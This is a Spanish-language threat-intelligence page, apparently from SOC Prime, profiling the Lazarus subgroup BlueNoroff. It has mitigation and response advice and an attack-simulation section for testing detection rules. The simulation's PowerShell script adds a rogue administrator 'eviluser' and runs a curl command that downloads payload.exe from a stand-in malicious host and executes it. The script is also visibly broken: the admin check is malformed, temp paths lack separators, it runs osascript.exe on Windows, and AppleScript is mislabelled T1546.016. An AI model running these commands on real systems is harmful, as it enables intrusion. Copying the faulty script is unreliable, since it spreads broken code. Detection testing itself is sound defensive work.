SOC Prime Bias: Crítico

21 Jan 2026 15:58 UTC

Grupo BlueNoroff: El Brazo del Cibercrimen Financiero de Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Grupo BlueNoroff: El Brazo del Cibercrimen Financiero de Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

BlueNoroff es un subgrupo financieramente motivado dentro del ecosistema de Lazarus que se centra en operaciones de robo de alto valor contra bancos, empresas de criptomonedas y objetivos más amplios de Web3. El manual del grupo abarca fraudes habilitados por SWIFT, compromisos de watering hole, envenenamiento de la cadena de suministro de paquetes Go y caminos de intrusión en macOS construidos alrededor de cebos de «entrevistas de trabajo» falsos. Para lograr ejecución y persistencia, BlueNoroff mezcla una pila de malware modular en Rust/Go con AppleScript, VBScript y flujos de trabajo de ingeniería social diseñados para eludir la precaución del usuario e integrarse en actividades legítimas de desarrollo y administración.

Investigación

El informe rastrea la trayectoria de BlueNoroff desde el atraco al Banco de Bangladesh en 2016 hasta las más recientes actividades de la era 2025 en la cadena de suministro, destacando cómo las herramientas y objetivos del actor se han expandido junto con el ecosistema cripto/Web3. Los investigadores describen patrones de infraestructura y catalogan componentes de malware que incluyen GhostCall, GhostHire, RustBucket y GillyInjector. La investigación también mapea comportamientos observados en MITRE ATT&CK a través de etapas como reconocimiento y acceso inicial, luego ejecución, persistencia y robo de credenciales, subrayando un énfasis constante en establecer puntos de apoyo sigilosos, la entrega escalonada de cargas útiles y rutas de acceso preparadas para el robo.

Mitigación

Reduzca la exposición al mejorar la higiene de la cadena de suministro: valide los paquetes extraídos de registros públicos, refuerce el control de encapsulamiento y procedencia, y revise continuamente las actualizaciones de dependencias para cambios inesperados en el mantenedor o el código. En macOS, fortalezca la gestión de LaunchAgent/LaunchDaemon y monitorice entradas de persistencia sospechosas y herramientas no firmadas. Bloquee dominios que se asemejan a los utilizados para el envío de cebos, refuerce la MFA para identidades privilegiadas y servicios expuestos externamente, y operacionalice detecciones para scripts maliciosos conocidos, cargadores y técnicas de empaquetado asociadas con el actor. Mantenga actualizaciones frecuentes de inteligencia de amenazas y refuerce la capacitación de los usuarios enfocada en spear-phishing y patrones de ingeniería social de «reclutador/entrevista de trabajo».

Respuesta

Si se descubren indicadores de BlueNoroff, aísle los hosts afectados y conserve las pruebas clave, incluidas líneas de comando completas, contenido de scripts y binarios o artefactos de paquetes descargados. Bloquee los dominios maliciosos identificados y las IPs de C2, luego ejecute los playbooks de respuesta a incidentes alineados con el robo de credenciales y escenarios de compromiso de la cadena de suministro. Despliegue o ajuste detecciones para cadenas de ejecución AppleScript y VBScript, y para patrones sospechosos de PowerShell mencionados en el informe, luego amplíe la búsqueda para identificar endpoints adicionales expuestos al mismo señuelo, dependencia o superposición de infraestructura.

Flujo de Ataque

Ejecución de Simulación

Requisito Previo: La Verificación de Telemetría y Línea Base de Pre-Vuelo debe haber sido aprobada.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y pretender generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa de Ataque y Comandos:

    1. Ejecución de AppleScript (T1546.016) – El adversario deja caer un payload.scpt malicioso en el endpoint (por ejemplo, a través de un adjunto de phishing). Usando un osascript.exe preinstalado (incluido con una herramienta de terceros), lanzan el script para ejecutar una carga útil de PowerShell que agrega una nueva cuenta de administrador local.
    2. Entrega de Clipboard ClickFix (T1204.004) – El atacante copia un comando preparado al portapapeles que invoca curl con un usuario-agente estilo Zoom para descargar una carga útil de segunda etapa, luego inmediatamente la ejecuta a través de cmd.exe. El comando también incluye una llamada en línea a powershell.exe -c para ejecutar la carga útil en memoria.
  • Script de Prueba de Regresión: El script a continuación reproduce ambos comportamientos de una manera determinista.

    #----- BEGIN REGRESSION TEST SCRIPT -----
    # Asegúrese de que estamos corriendo con privilegios administrativos
    if (-not ([Security.Principal.WindowsPrincipal] `
        [Security.Principal.WindowsBuiltInRole] "Administrator")) {
        Write-Error "Run this script as Administrator."
        exit 1
    }
    
    # 1. Ejecución de AppleScript vía osascript.exe
    $appleScriptPath = "$env:TEMPmalicious.scpt"
    Set-Content -Path $appleScriptPath -Value @"
    tell application "System Events"
        do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
    end tell
    "@
    # Ejecute el AppleScript
    Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait
    
    # 2. Entrega estilo ClickFix del portapapeles
    $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
    # Ejecute vía cmd.exe para coincidir con la condición de regla
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait
    
    # Limpieza: eliminar artefactos
    Remove-Item -Path $appleScriptPath -Force
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    # Fin del script
    #----- END REGRESSION TEST SCRIPT -----
  • Comandos de Limpieza: Elimine cualquier proceso, archivo y cuenta de usuario de prueba restantes.

    # Detener cualquier proceso restante (defensivo - normalmente no es necesario)
    Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Eliminar archivos temporales
    Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
    
    # Eliminar la cuenta administradora de prueba si fue creada
    if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
        Remove-LocalUser -Name "eviluser"
    }